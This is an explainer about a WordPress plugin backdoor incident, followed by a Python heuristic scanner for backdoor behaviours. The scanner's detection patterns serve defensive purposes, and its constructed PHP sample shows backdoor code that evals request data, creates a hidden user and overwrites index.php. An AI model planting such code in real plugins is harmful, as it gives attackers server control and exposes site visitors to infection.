WordPress plugins had a malicious backdoor added to them via the plugin repository. That led to WordPress.org resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the WP.org team did an amazing job dealing with this incident and getting it all fixed very fast.
Plugins are a great place for the hacker to hide the code for three reasons. One, because people don’t really look at them. Two, because people don’t like to upgrade their plugins, so the backdoors survive the upgrades. Three, there are some poorly coded plugins which probably have their own vulnerabilities to begin with.
A backdoor is a method of bypassing normal authentication and gaining the ability to remotely access the server while remaining undetected. Most smart hackers always upload the backdoor as the first thing.
Security researchers at Sucuri analyzed the plugin and found that it had been modified with a backdoor which gives attackers full access to the server.
Some backdoors simply allow users to create a hidden admin username, whereas the more complex backdoors can allow the hacker to execute any PHP code sent from the browser. Others have a full-fledged UI that allows them to send emails as your server, execute SQL queries, and do everything else they want to do.
The malicious code in the plugin replaces the index.php file with malicious code retrieved from the attacker's server. So, when users visit the site, they are redirected either to spam sites or to exploit kits that will infect the visitor's system.
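A heuristic scan of plugin PHP files for the three behaviours described above (running request-supplied PHP, creating accounts, writing to index.php), as an added example that is not from the original post or from Sucuri. The rule patterns and the sample are assumptions constructed for illustration, and every hit needs manual review because legitimate plugins can match.

```python
import re
from pathlib import Path

# Heuristic rules (assumptions of this example), one per behaviour described above.
RULES = {
    "executes request-supplied PHP": re.compile(
        r"\b(?:eval|assert|create_function)\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)", re.I),
    "creates a user account": re.compile(r"\bwp_(?:create|insert)_user\s*\(", re.I),
    "writes to index.php": re.compile(
        r"\b(?:file_put_contents|fopen|copy|rename)\s*\([^;]*index\.php", re.I),
}

# Constructed sample for demonstration; not taken from any real plugin.
SAMPLE = """<?php
function example_sync() {
    if (isset($_REQUEST['k'])) { eval(base64_decode($_REQUEST['k'])); }
    wp_create_user('support', $pw, 'support@example.invalid');
    file_put_contents(ABSPATH . 'index.php', wp_remote_retrieve_body($r));
}
"""

def scan_source(php):
    """Return (line number, rule name) for each heuristic hit in one PHP source."""
    hits = []
    for lineno, line in enumerate(php.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((lineno, name))
    return hits

def scan_plugins(plugins_dir):
    """Scan every .php file under a plugins directory; return {path: hits}."""
    report = {}
    for path in sorted(Path(plugins_dir).rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, hits in scan_plugins(sys.argv[1]).items():
            for lineno, name in hits:
                print(f"{path}:{lineno}: {name}")
    else:
        for lineno, name in scan_source(SAMPLE):
            print(f"sample:{lineno}: {name}")
```

Pass the site's wp-content/plugins directory as the first argument to scan real files. Matching is line by line, so statements split across lines and obfuscated code are missed.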